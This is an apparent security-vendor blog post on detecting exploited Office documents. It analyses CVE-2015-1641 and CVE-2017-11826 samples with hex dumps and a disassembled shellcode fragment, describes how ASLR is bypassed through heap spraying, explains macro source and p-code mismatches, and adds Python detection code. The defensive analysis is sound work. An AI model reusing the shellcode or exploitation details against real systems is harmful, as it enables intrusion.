
Assessing risk in Office documents - Part 4: CVE and generic exploit detection


Tuesday, Jun 04, 2019

In part 4, the final part of this 4-part blog series, we’ll examine why and how exploits are used to get code running within Office documents and how we can find signs of Office documents being exploited without knowing about the actual vulnerability itself. We’ll walk through a few commonly exploited vulnerabilities and show you that knowledge about the exploit itself might not be needed. We’ll also investigate obfuscation used on macros and how we cannot always rely on what we see at first sight. At the end we’ll summarize what elements we’ve looked at in this series of blogs that raise risk within documents.

In case you missed part 1, part 2 and part 3, here is the background: Forcepoint Innovation Labs conducted a research project to see if we can evaluate risk associated with Microsoft Office documents without focusing on specific malware families. Anti-virus engines need to be able to classify a document as malicious to block it, while we want to evaluate the level of risk a document carries without those constraints. Code, or the possibility of getting any code in any form, adds risk. If the level of risk is unacceptable we can then block/quarantine the document on our gateways.

As you progress through the blog series you will build up the knowledge to assess risk instead of depending on a clear AV engine conviction.

Why do attackers use exploits?

Attackers need to find a way of getting their code to run when a document is activated. Having macros or embedding executable code is quite noticeable, as is linking if you search in the right places. Exploiting vulnerabilities within the Office suite is harder to defend against on the gateway when documents are inspected. As we discussed in part 1, vulnerabilities are bugs in the software code. If they can be exploited to get code to run it becomes much more convenient for an attacker to get their code running inside your organization. If it’s an unknown vulnerability (0-day) being exploited it’s very hard to defend against at a gateway-level - or at all. We'll discuss that later when we discuss generic exploit detection.

Let’s take an example when you’re dealing with a document with no embedded executable content, no URLs and no macros to investigate.

Exploiting a known vulnerability means that at some stage, something inside the document is specifically modified in a way that makes the application opening the document behave the way the attacker wants. The real question is what has been changed to achieve that. A normal document might have thousands of configuration settings: binary streams with records describing one area, XML with a lot of values and data, RTF with its structures and so on. How do you pinpoint which one will cause a problem? It could be as simple as setting a hexadecimal value to something Office doesn’t expect and causing Office to malfunction, but that’s just the very first step. Afterwards the exploit needs to be able to transfer execution to code available from somewhere within the document file. This code needs to contain instructions the actual CPU understands, for example x86/x64 code.

CVE-2015-1641

Let’s follow a practical example. You are familiar with CVE-2017-11882, which we covered in part 3. The bug is that no length check is done on the filename copied into a buffer of just 40 bytes, and the code that will be executed is located within the same stream. This time we’ll follow another well-used vulnerability, CVE-2015-1641, which works in a different way (Sample 1). Note that the complete output of the objects found with our own research tool can be found in Appendix B.

We start this journey with an RTF file that contains several objdata objects; we’ll start with the first. This file contains an embedded OLE2 archive. Inside this OLE2 archive you’ll find a Root Entry/Package stream which is a ZIP archive:

Inside the ZIP we have a lot of XML files, which you normally have within any newer Word documents. The bug that has been exploited relates to SmartTag handling. If we search for the various SmartTags defined in these XML files, we find the bad one in word.document.12.objects/Root Entry/Package.objects/word/document.xml:

What’s different with this SmartTag compared to the others also present in the file? The difference is the “id”, “moveFromRangeStart”, “moveFromRangeEnd” and the “name”. Now we need to understand what the bug is. The problem is that this SmartTag entry tells Word to start using offset 0x09000808 (150997000 in decimal) as its stack. At some point Word will execute a “retn” instruction and now it’s up to this new stack to define where the CPU execution will continue. Why select 0x09000808? With Address Space Layout Randomization (ASLR), why did the malware author set the stack to this location? To start the answer, the malware uses an ActiveX component called OTKLOADR.DLL. This DLL depends on a Microsoft C runtime library called MSVCR71.DLL which unfortunately doesn’t support ASLR. This means it will get loaded at a specific base-offset every time. It then uses ActiveX to perform a heap spray and maps a single binary blob (activeX52.bin) many times over in memory:

The file activeX52.bin is an OLE2 archive of 2095161 bytes which gets mapped into memory numerous times (filling up the buffer around the specified new stack ~0x09000000):

-ScanObject("ARCHIVE_FS" (1:"OLE2",2095616,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin")
-ScanObject("OLE2_FS" (0:"UNKNOWN",106,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin|Root Entry/Contents")

As you can see, the file itself is huge, but its “real” content is small – only a 106-byte “Contents” stream. What do you think the rest is for? It’s the data/code needed to lead the execution to the shellcode.

If you didn’t know exactly what bug the malware author is abusing, what other elements could you have said are risky about this document?

  • To start with, it uses a non-standard opening in place of {\rtf1, but sadly Office just checks the first 4 bytes ({\rt) and the rest isn’t validated.
  • Some obfuscation is done inside the RTF objdata structures, but it's not complex. It could be enough to justify a block – e.g.: {A\*\o b jdata  {\*\AAAAAAAA 12345678901234567890 111111111111111}
  • The RTF consists of many embedded OLE2 archives; you would probably get a lot of false alarms if you blocked on that basis.
  • It uses an ActiveX component that relies on a DLL that is not ASLR-aware. You’d need to research which ActiveX classes internally use which DLLs that are not ASLR-aware – which is doable.
  • It maps the same (huge?) binary blob into memory at many different locations:
    • This binary blob contains x86 code, and/or points to, in this case, 0x7C3761BB – inside the non-ASLR DLL MSVCR71.DLL.
  • The mapped OLE2 archive only contains a single 106-byte stream, and has approximately 2MB of data/code unaccounted for.
  • Data is found after the last '}' that closes the {\rtvpn opening group. There shouldn’t be anything there.

So, even if you didn’t know about this specific vulnerability there are many signs saying this file is trying to exploit a vulnerability and shouldn’t be allowed anywhere since it poses risk. VirusTotal says 42 of 58 engines detect this file, but ideally it should have been 100% since the vulnerability is from 2015.
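Two of the indicators listed above can be checked mechanically: an opening that passes Office's 4-byte check without being {\rtf1, and data left after the brace that closes the outermost group. The following is an added example, not the research tool's code; the function names and both sample byte strings are constructed for illustration.

```python
import re

# \binN introduces N raw bytes that may contain unbalanced braces.
BIN_RE = re.compile(rb"\\bin(\d+) ?")


def root_group_end(data: bytes):
    """Return the offset of the '}' that closes the outermost RTF group, or None."""
    depth, i = 0, 0
    while i < len(data):
        ch = data[i:i + 1]
        if ch == b"\\":
            m = BIN_RE.match(data, i)
            if m:                                   # skip the raw binary run
                i = m.end() + int(m.group(1))
            elif data[i + 1:i + 2] in (b"\\", b"{", b"}"):
                i += 2                              # escaped \\, \{ or \}
            else:
                i += 1                              # ordinary control word
            continue
        if ch == b"{":
            depth += 1
        elif ch == b"}":
            depth -= 1
            if depth <= 0:
                return i
        i += 1
    return None


def rtf_structure_check(data: bytes) -> dict:
    """Report the two structural indicators discussed above for one RTF file."""
    if not data.startswith(b"{\\rt"):
        raise ValueError("does not start with {\\rt, so Office would not treat it as RTF")
    # Office accepts the first 4 bytes; here we ask whether the control word
    # really is \rtf1 and not something like \rtvpn.
    header_ok = re.match(rb"\{\\rtf1(?![0-9A-Za-z])", data) is not None
    end = root_group_end(data)
    # Whitespace and NUL padding after the final brace are tolerated
    # (an assumption of this example); anything else counts as appended data.
    trailing = b"" if end is None else data[end + 1:].strip(b" \t\r\n\x00")
    return {
        "header_ok": header_ok,
        "root_end": end,
        "balanced": end is not None,
        "trailing_bytes": len(trailing),
    }


# Constructed samples (not taken from the analysed file).
GOOD_RTF = b"{\\rtf1\\ansi{\\fonttbl{\\f0 Arial;}}\\pard Hello \\{world\\}\\par}\r\n"
BAD_RTF = (b"{\\rtvpn\\ansi{\\fonttbl{\\f0 Arial;}}\\pard Hello\\bin4 }}{{\\par}"
           + b"X" * 32)

if __name__ == "__main__":
    for name, sample in (("good", GOOD_RTF), ("bad", BAD_RTF)):
        print(name, rtf_structure_check(sample))
```

The brace walk skips escaped braces and \bin payloads so that raw bytes inside the document cannot move the reported end of the root group.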

CVE-2017-11826

Let’s look at another exploit, this time for CVE-2017-11826 (Sample 2). Again, we deal with an RTF file and as before the complete output from our research tool can be found in Appendix B.

To start with, let’s focus on the 2 Word documents we’ll find embedded:

-ScanObject("GENERIC_FS" (10:"RTF",560752,"d9fac68b6c49c485675d9141f375799d10572999")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",14385,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0")
              -ScanObject("MEM_FS" (1:"OLE2",14336,"d9fac68b6c49c485675d9141f375799d10572999|objdata_0|RTFOLEOBJECT|word.document.12")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",53297,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1")
              -ScanObject("MEM_FS" (1:"OLE2",53248,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12")

There are no macros, no linking and nothing directly attached that could be directly executable. We now need to check if this could be using an exploit. As we’ve mentioned before, we need 2 or 3 things to occur:

  • A bug needs to be exploited so execution of some code can be carried out
  • Redirection to this code must occur if it’s not a part of the buffer doing the exploitation
  • The code itself, most likely a set of valid x86 instructions

Inside the RTF we find the following:

It’s using a COM object with a slightly obfuscated CLSID D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731. This corresponds to MSVBVM60.DLL (Visual Basic 6 runtime). This DLL does not use ASLR and will therefore load at a static location.

Another line from the output of our own tool is also very interesting:

Embedded into objdata_1, we find a “Package” that contains a Word Document that contains a new OLE2 archive (activeX1.bin). This is 2099200 bytes long (over 2 MB), but it only contains a root entry. Could we have a bug in our parser?

00000400  52 00 6f 00 6f 00 74 00  20 00 45 00 6e 00 74 00  |R.o.o.t. .E.n.t.|
00000410  72 00 79 00 00 00 00 00  00 00 00 00 00 00 00 00  |r.y.............|
00000420  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000430  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000440  16 00 05 00 ff ff ff ff  ff ff ff ff 01 00 00 00  |................|
00000450  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000460  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000470  00 00 00 00 03 00 00 00  40 00 00 00 00 00 00 00  |........@.......|
00000480  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000490  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004a0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004c0  00 00 00 00 ff ff ff ff  ff ff ff ff ff ff ff ff  |................|
000004d0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004e0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
000004f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000500  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

This is very suspicious as there is no file inserted in the OLE2 archive. Why would any legit program do this? In the “unused” area of this file we find some repeating data:

00003200  2b 0e 98 72 2b 0e 98 72  2b 0e 98 72 2b 0e 98 72  |+..r+..r+..r+..r|
00003210  2b 0e 98 72 2b 0e 98 72  2b 0e 98 72 2b 0e 98 72  |+..r+..r+..r+..r|
00003220  2b 0e 98 72 2b 0e 98 72  2b 0e 98 72 2b 0e 98 72  |+..r+..r+..r+..r|

00003800  cb 40 94 72 ec 83 88 08  cb 40 94 72 ec 83 88 08  |.@.r.....@.r....|
00003810  cb 40 94 72 ec 83 88 08  cb 40 94 72 ec 83 88 08  |.@.r.....@.r....|
00003820  cb 40 94 72 ec 83 88 08  cb 40 94 72 ec 83 88 08  |.@.r.....@.r....|
00003f30  cb 40 94 72 d0 10 94 72  8f 08 95 72 b0 dd 95 72  |.@.r...r...r...r|
00003f40  90 8c 88 08 01 02 00 00  40 00 00 00 45 c0 a4 72  |........@...E..r|
00003f50  89 2d 88 88 88 08 9b 9b  33 c9 64 8b 71 30 8b 76  |.-......3.d.q0.v|
00003f60  0c 8b 76 1c 8b 46 08 8b  7e 20 8b 36 81 3f 6b 00  |..v..F..~ .6.?k.|
00003f70  65 00 75 f0 8b f0 eb 57  60 8b de 56 8b 73 3c 8b  |e.u....W`..V.s<.|
00003f80  74 1e 78 03 f3 56 8b 76  20 03 f3 33 c9 49 41 ad  |t.x..V.v ..3.IA.|

If we try to disassemble this code (from offset 0x3f58) we get the following using “objdump -D -Mintel,i386 -b binary -m i386 activeX1.bin --start-address=0x3f58”:

    3f58:     33 c9                      xor    ecx,ecx
    3f5a:     64 8b 71 30                mov    esi,DWORD PTR fs:[ecx+0x30]
    3f5e:     8b 76 0c                   mov    esi,DWORD PTR [esi+0xc]
    3f61:     8b 76 1c                   mov    esi,DWORD PTR [esi+0x1c]
    3f64:     8b 46 08                   mov    eax,DWORD PTR [esi+0x8]
    3f67:     8b 7e 20                   mov    edi,DWORD PTR [esi+0x20]
    3f6a:     8b 36                      mov    esi,DWORD PTR [esi]
    3f6c:     81 3f 6b 00 65 00          cmp    DWORD PTR [edi],0x65006b
    3f72:     75 f0                      jne    0x3f64
    3f74:     8b f0                      mov    esi,eax
    3f76:     eb 57                      jmp    0x3fcf

    3f78:     60                         pusha 
    3f79:     8b de                      mov    ebx,esi
    3f7b:     56                         push   esi
    3f7c:     8b 73 3c                   mov    esi,DWORD PTR [ebx+0x3c]
    3f7f:     8b 74 1e 78                mov    esi,DWORD PTR [esi+ebx*1+0x78]
    3f83:     03 f3                      add    esi,ebx
…
    3fcf:     8b fc                      mov    edi,esp
    3fd1:     c7 07 67 59 de 1e          mov    DWORD PTR [edi],0x1ede5967
    3fd7:     c7 47 04 00 00 00 00       mov    DWORD PTR [edi+0x4],0x0
    3fde:     8b ef                      mov    ebp,edi
    3fe0:     e8 93 ff ff ff             call   0x3f78
    3fe5:     6a 40                      push   0x40
    3fe7:     68 00 30 00 00             push   0x3000
    3fec:     68 00 00 50 00             push   0x500000
    3ff1:     6a 00                      push   0x0
    3ff3:     ff 17                      call   DWORD PTR [edi]
    3ff5:     8b f8                      mov    edi,eax
    3ff7:     8f 47 24                   pop    DWORD PTR [edi+0x24]

Clearly this is shellcode that an attacker wants to use. We see it going through the PEB (Process Environment Block) looking through one of the loader-lists for the DLL starting with “KE”; which is KERNEL32.DLL. From here on it’s "game on" for the malware. We know the malware wants code execution to end up here for it to deliver its payload. Once again, we can see that it maps activeX1.bin several times in memory:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
       <Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary" Target="activeX1.bin"/>
</Relationships>

If we count the number of activeX??.xml_rels it uses we find 40 instances of this 2MB binary mapped into the process space of Word. It’s definitely used to heap-spray the memory to prepare to use an exploit. At the end of the legit space of the RTF file, we find data appended to it too:

It's clearly a risky document. To understand what specific CVE it is using is secondary at this stage, but let’s examine what makes CVE-2017-11826 work. There is a bug in Office when it tries to render tags within the Office Open XML format. The tag:

The font name doesn’t look right. Let’s look at it in a hex-editor:

This will exploit the bug in Office, and via the known address space of MSVBVM60, the ROP chain and the shellcode execution, the attacker has a stable environment to run their payload. VirusTotal shows the detection of this file being 36 of 58 engines at the time of testing.

Once again, without too much knowledge of the vulnerability itself there are many signs that this file does contain an exploit and should be blocked on a gateway.
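The "huge archive, almost no content" observation made for activeX52.bin in Sample 1 and activeX1.bin in Sample 2 can be measured by reading the OLE2 directory, summing the declared stream sizes and comparing that with the file size, then looking for one 32-bit value that dominates the file. This is an added example, not the research tool's code; the function names and the input produced by build_sample() are constructed, and the filler reuses the bytes 2b 0e 98 72 seen in the dump above.

```python
import struct
from collections import Counter

CFB_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")
MAX_REGULAR_SID = 0xFFFFFFFA      # larger values are FAT markers, not sectors
STREAM, ROOT = 2, 5               # directory entry object types


def parse_directory(data):
    """Return (sector_size, structure_sectors, [(name, type, size), ...])."""
    if data[:8] != CFB_MAGIC:
        raise ValueError("not an OLE2 compound file")
    shift, = struct.unpack_from("<H", data, 0x1E)
    if shift not in (9, 12):
        raise ValueError("unexpected sector shift")
    ssize = 1 << shift
    first_dir, = struct.unpack_from("<I", data, 0x30)

    def sector(sid):              # sector 0 starts right after the header
        return data[(sid + 1) * ssize:(sid + 2) * ssize]

    # FAT sectors named in the header DIFAT; DIFAT chain sectors (only needed
    # for files above roughly 7 MB) are not followed in this example.
    fat_sids = [s for s in struct.unpack_from("<109I", data, 0x4C)
                if s <= MAX_REGULAR_SID]
    fat = []
    for sid in fat_sids:
        raw = sector(sid)
        fat.extend(struct.unpack("<%dI" % (len(raw) // 4), raw[:len(raw) & ~3]))

    entries, seen, sid = [], set(), first_dir
    while sid <= MAX_REGULAR_SID and sid not in seen:   # follow directory chain
        seen.add(sid)
        raw = sector(sid)
        for off in range(0, len(raw) - 127, 128):
            name_len, obj_type = struct.unpack_from("<HB", raw, off + 0x40)
            if obj_type == 0:                           # unallocated entry
                continue
            size, = struct.unpack_from("<Q", raw, off + 0x78)
            if shift == 9:
                size &= 0xFFFFFFFF                      # v3 uses 32-bit sizes
            name = raw[off:off + max(min(name_len, 64) - 2, 0)]
            entries.append((name.decode("utf-16-le", "replace"), obj_type, size))
        sid = fat[sid] if sid < len(fat) else 0xFFFFFFFE
    return ssize, len(fat_sids) + len(seen), entries


def slack_report(data):
    """Compare declared stream bytes with file size and look for a sprayed value."""
    ssize, structure_sectors, entries = parse_directory(data)
    stream_bytes = sum(size for _, typ, size in entries if typ == STREAM)
    structure = ssize * (1 + structure_sectors)   # header + FAT + directory
    unaccounted = max(len(data) - structure - stream_bytes, 0)
    # Most frequent aligned 32-bit value, ignoring zero fill and 0xFFFFFFFF.
    counts = Counter(v for v, in struct.iter_unpack("<I", data[:len(data) & ~3])
                     if v not in (0, 0xFFFFFFFF))
    top, hits = counts.most_common(1)[0] if counts else (0, 0)
    return {
        "streams": [name for name, typ, _ in entries if typ == STREAM],
        "stream_bytes": stream_bytes,
        "unaccounted": unaccounted,
        "unaccounted_ratio": unaccounted / len(data),
        "top_dword": top,
        "top_dword_share": hits * 4 / len(data),
    }


def build_sample(filler_sectors=120):
    """Constructed input: a compound file holding only a Root Entry plus filler."""
    header = bytearray(512)
    header[:8] = CFB_MAGIC
    struct.pack_into("<HHHHH", header, 0x18, 0x3E, 3, 0xFFFE, 9, 6)
    struct.pack_into("<II", header, 0x2C, 1, 1)        # 1 FAT sector, dir at 1
    struct.pack_into("<II", header, 0x38, 0x1000, 0xFFFFFFFE)
    struct.pack_into("<I", header, 0x44, 0xFFFFFFFE)   # no DIFAT sectors
    struct.pack_into("<109I", header, 0x4C, 0, *[0xFFFFFFFF] * 108)
    fat = struct.pack("<128I", 0xFFFFFFFD, 0xFFFFFFFE, *[0xFFFFFFFF] * 126)
    root = bytearray(128)
    name = "Root Entry".encode("utf-16-le")
    root[:len(name)] = name
    struct.pack_into("<HBB", root, 0x40, len(name) + 2, ROOT, 1)
    struct.pack_into("<III", root, 0x44, *[0xFFFFFFFF] * 3)
    struct.pack_into("<I", root, 0x74, 0xFFFFFFFE)
    filler = bytes.fromhex("2b0e9872") * (filler_sectors * 128)
    return bytes(header) + fat + bytes(root) + bytes(384) + filler


if __name__ == "__main__":
    report = slack_report(build_sample())
    print(report["streams"], report["unaccounted"], hex(report["top_dword"]))
```

The accounting ignores mini FAT sectors and sector rounding, so it is an estimate; thresholds for blocking on the two ratios are left to policy.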

Malicious macros as source-code, p-code or executable code?

Office macro code can exist in 3 different forms. So far we have extracted the decompressed LZNT1 source-code. It doesn’t have to be present (although it has some limitations if it’s not there) and there could still be executable macro code running, causing risk to the organization. Office will “compile” the source-code lines into p-codes during creation in the editor. These p-codes will be stored in the module stream. The source-code is only used to recompile the p-code if the document is opened under a different VBA version than the author used when the document was generated (e.g. VBA5 and VBA7). That means if the source-code isn’t present - and Office needs to recompile because of a VBA version mismatch - it doesn’t work. If the p-code has been executed at least once it will be converted to execodes and stored in the __SRP_? streams. Presence of p-code, execodes or source code is a sign of code from macros being present that needs to be analysed, or removed if that complies with policy. They all add risk.

As our final example, let’s consider Sample 3:

-ScanObject("GENERIC_FS" (1:"OLE2",38400,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27")
       -ScanObject("OLE2_FS" (21:"TEXT",367,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/PROJECT")
       -ScanObject("OLE2_FS" (16:"VBAx_MACRO",10363,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/VBA/ThisDocument")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",522,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/VBA/dir")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",2681,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/VBA/_VBA_PROJECT")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",41,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/Macros/PROJECTwm")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",7280,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/1Table")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/WordDocument")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",114,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/.CompObj")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/.SummaryInformation")
       -ScanObject("OLE2_FS" (0:"UNKNOWN",4096,"cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27|Root Entry/.DocumentSummaryInformation")

Nothing out of the ordinary here. We have a VBA/ThisDocument which contains the macro source-code. If we look at this source code, it decompresses to:

Sub sbHello()
MsgBox "Hello World!"
End Sub

That doesn’t look very malicious does it? A function sbHello shows a message box “Hello World”. Maybe someone is testing something for the first time?

If we have a look at the identifiers present in the VBA_PROJECT stream - which was created by Word when the “original” macro was entered – it looks like this:

VBA_IDENTIFIERS:
Word, VBA, Win16, Win32, Win64, Mac, VBA6, VBA7, Project1, stdole, Project, ThisDocument
_Evaluate, Normal, Office, Auto_Open, Document, omVsI, GhHqwBBoV, TWgKXCEMpLNvAkL
duWktH, zomnqaCVeYJhMzN, ifZKwUg, CreateObject, hCiSSPdnGWigF, Run, title, msg
intResponse, MsgBox, Application, Quit

Indeed it has an MsgBox identifier, but where is sbHello? Why is there an Auto_Open, CreateObject, Application, Run etc? It seems likely that the source-code has been replaced and the p-code present in this document could be up to no good. If we use an excellent tool from Vesselin Bontchev called pcodedmp we see that the code compiled in the document (Appendix 4 – Sample 4) isn’t anything near as innocent as MsgBox (“Hello World”). In fact, it’ll use powershell.exe, probably to carry out a download. This could be the work of a tool called EvilClippy; read about it here.

As I see it we have 2 challenges:

  1. If source code is present we can match the VBA_PROJECT identifiers to the source-code. If we see that most of the identifiers are used, and that the source doesn’t use identifiers not present in the VBA_PROJECT, one can assume the source code to be accurate. Our research tool calculates how well the source code matches the identifiers, and how many of the identifiers are actually used in the source, and hence it’s easy to identify that there is a mismatch and that the document carries code that causes too much risk (SourcePCode_Match:50.00|SourcePCode_Unused:96.00).
  2. If the source-code is totally removed and you only have the p-code to analyse you need to implement functionality similar to what Vesselin Bontchev implemented in his pcodedmp and base your detection on this rather than the source-code. In fact, this is something you should start doing right now anyway (as you’ll see below)!
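The comparison in challenge 1 can be sketched with the Sample 3 data shown above. This is an added example, not the research tool's code: the page does not give the tool's formula, so the two percentages below use a definition assumed here (share of source identifiers found in the table, and share of table identifiers the source never uses) and need not equal the tool's figures. The keyword list and the watch-list are also assumptions of the example.

```python
import re

# Constructed from the listings on this page: the decompressed source of
# Sample 3 and the identifier table recovered from its VBA project stream.
SOURCE = 'Sub sbHello()\nMsgBox "Hello World!"\nEnd Sub\n'
IDENTIFIER_TABLE = """
Word, VBA, Win16, Win32, Win64, Mac, VBA6, VBA7, Project1, stdole, Project, ThisDocument
_Evaluate, Normal, Office, Auto_Open, Document, omVsI, GhHqwBBoV, TWgKXCEMpLNvAkL
duWktH, zomnqaCVeYJhMzN, ifZKwUg, CreateObject, hCiSSPdnGWigF, Run, title, msg
intResponse, MsgBox, Application, Quit
"""

# Language keywords are dropped before comparing (partial list, an
# assumption of this example).
VBA_KEYWORDS = {
    "sub", "end", "function", "dim", "as", "if", "then", "else", "elseif",
    "for", "each", "in", "next", "to", "step", "set", "let", "call", "with",
    "do", "loop", "while", "wend", "until", "exit", "on", "error", "resume",
    "goto", "private", "public", "const", "static", "byval", "byref",
    "option", "explicit", "new", "nothing", "true", "false", "and", "or",
    "not", "string", "integer", "long", "boolean", "variant", "object",
}

# Names the article singles out as unexpected for a "Hello World" macro.
WATCHLIST = {"auto_open", "createobject", "application", "run"}


def source_identifiers(source):
    """Identifiers used by the source, lower-cased (VBA is case-insensitive)."""
    text = re.sub(r'"(?:[^"\r\n]|"")*"', " ", source)     # drop string literals
    text = re.sub(r"(?im)('|\brem\b).*$", " ", text)       # drop comments
    tokens = re.findall(r"[A-Za-z_][A-Za-z0-9_]*", text)
    return {t.lower() for t in tokens} - VBA_KEYWORDS


def table_identifiers(table):
    """Identifiers from a comma/whitespace separated dump of the table."""
    return {t.lower() for t in re.split(r"[,\s]+", table) if t}


def compare(source, table):
    src, tab = source_identifiers(source), table_identifiers(table)
    only_in_source = sorted(src - tab)
    hidden = sorted((tab - src) & WATCHLIST)
    return {
        # share of source identifiers that the compiled project knows about
        "match_pct": 100.0 * len(src & tab) / len(src) if src else 0.0,
        # share of project identifiers the visible source never mentions
        "unused_pct": 100.0 * len(tab - src) / len(tab) if tab else 0.0,
        "only_in_source": only_in_source,
        "hidden_watchlist": hidden,
        # the source names something the project never compiled, or the
        # project holds watch-listed names that the source hides
        "mismatch": bool(only_in_source or hidden),
    }


if __name__ == "__main__":
    for key, value in compare(SOURCE, IDENTIFIER_TABLE).items():
        print(f"{key}: {value}")
```

Standard entries such as Word, VBA or Win32 are present in the table of any project, so the unused share alone is a weak signal; the identifiers that appear only in the source and the watch-listed names missing from it carry the verdict here.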

A check on VirusTotal shows us that 4 out of 60 engines detect this as malicious. This is clearly an area of improvement for the other 56 engines (also you can see signs that Vesselin worked at F-prot (now Cyren) some time ago).

Conclusion

Detecting documents that have exploits can be hard. It helps if there is a corresponding known vulnerability so you can pinpoint exactly what error in the document will make Office malfunction. In many cases there are signs you can use to say a document is exploited, as we’ve seen with both CVE-2017-11826 and CVE-2015-1641. If you decompile the documents to the lowest level you will find clear indicators that the file is exploited without knowing exactly what bug it’s trying to utilize.

 

To summarize a few indicators of risk we have discussed:

  • VBA macros are present (in any form, and validate that source code matches the executable format – or check the p-code directly!)
  • Embedded objects carry direct executable content (*.exe, *.js, *.vbs etc)
  • Any object that contains any kind of code/logic capability, e.g. PDF AcroForms.
  • Some kind of linking is done towards non-whitelisted domains/URLs
  • Obfuscation done at any level in an attempt to hide real content
  • Slack-space present in RTF files or OLE2 archives indicates risk, as does the presence of large binary blobs that have no special use (or contain repeating content).
  • Use of components not compatible with ASLR, or known to be used by malicious actors
  • Mapping up binary content that contains shellcode in memory
  • Any data-stream containing shellcode (or valid x86 code)
  • Strange "cocktails" of objects embedded into other objects

 

Documents that carry risk your organization isn’t willing to take can take 2 paths:

  • Block
  • Quarantine – it’s not delivered and will be quarantined for deeper analysis
  • Clean - attempt to remove only the risky elements
  • Perform document sanitation – only known-good elements from a document are brought over to a new instance to remove traces of malicious intent, which in essence means (re)building a new document with the old visual contents.

 

We hope you have enjoyed our tutorial on assessing risk in Office documents and hope it has given you insights on how to control risk of documents within your organization. Please talk to us if you need our help!

 

Appendix A

Sample 1 - 72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9
Sample 2 - d9fac68b6c49c485675d9141f375799d10572999
Sample 3 - cad8cb2e9d16623f6b09b22e058f15585c36f3bb5379c5dc578a1d44c0bf2b27

Appendix B

Full example of sample 1

                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX35.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX36.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX37.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX38.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX39.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX4.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",502,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX40.xml")
